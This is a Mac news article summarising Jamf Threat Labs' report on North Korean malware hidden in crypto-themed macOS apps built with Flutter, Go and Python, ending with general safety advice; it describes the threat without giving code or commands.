Mac News

North Korean Hackers Target Mac Users with Malware Crypto Apps

By Paul Terpstra
Green-lit laptop screen displaying code.

In a recent security alert, North Korean hackers have developed a new way to target Mac users. According to Jamf Threat Labs, these hackers embedded malware in macOS applications disguised as crypto-related games or utilities. The apps target users interested in cryptocurrency and appear harmless, increasing the chances of successful attacks.


How the Malware Operates

The hackers created these infected apps using Flutter, a popular app-building tool by Google. Flutter allows apps to work seamlessly on macOS, iOS, and Android with a single codebase. However, this platform’s structure also makes it easy for hackers to hide malicious code. The malware is difficult for standard security checks to detect, as it hides within a dynamic library file used by Flutter.

Green-lit laptop screen displaying code.

One of the malware-laden apps, named “New Updates in Crypto Exchange,” looks like a simple game. But hidden within its code is a function that connects to a domain linked to North Korean cyber activities. Once connected, the app downloads additional malicious scripts that allow remote control of the infected Mac.

Variants of the Malware

Jamf Threat Labs identified three different versions of the malware. Each is designed for specific programming environments: Flutter, Go, and Python. Despite their differences, these variants all communicate with external servers controlled by North Korean hackers. For example, the Python-based version looks like a basic notepad app but connects to a suspicious domain, allowing attackers to execute harmful AppleScripts remotely.


The malware exploits AppleScript, a tool on macOS for automating tasks and app communication. Through AppleScript, hackers can capture data, install more malware, and perform other unauthorized actions.

Staying Safe from This Threat

Though there is no evidence that these apps have been widely spread, Mac users should remain cautious. Only downloading apps from the Mac App Store reduces the risk, as Apple reviews apps for security. Keeping macOS and installed apps updated is also crucial, as updates often include patches against new security risks.

Share This Article
Latest Articles
iPhone 17 Pro showcasing its sleek design and camera.
iPhone 17 Pro Expected to Retain Titanium Design
3 Min Read
Apple Privacy logo on a black background.
Apple Employee Sues Over Alleged Privacy Violations
2 Min Read
Front view of the Apple Vision Pro headset.
Apple Vision Pro Expands Global Reach with Taiwan Launch
2 Min Read
Side view of the Apple Vision Pro headset.
Apple Rolls Out Fourth Developer Beta of visionOS 2.2
2 Min Read
Two Apple Watches with glowing bands on a dark background.
Apple Watch: Unveiling Lesser-Known Health Insights
3 Min Read
Amazon logo with a dark background.
Apple Explores Amazon AI Chips to Train Future Models
3 Min Read
Apple Books logo with text.
Apple Books Celebrates 2024 with Year in Review
2 Min Read
Red skull on binary code background.
Mac Malware on the Rise: New Threats Target Apple Users
2 Min Read
Back view of two iPad Pro models.
M5 iPad Pro Rumored for Late 2025 Launch
2 Min Read
Apple Intelligence logo displayed on a smartphone screen.
Apple Faces Challenges with Apple Intelligence in China
2 Min Read
Apple logo over a pile of cash in a briefcase.
Ex-Apple Employees Charged in $152K Donation Fraud
2 Min Read
Red iPhone SE front and back view.
iPhone SE 4: Apple’s Budget-Friendly AI-Powered Contender
2 Min Read
Table of Contents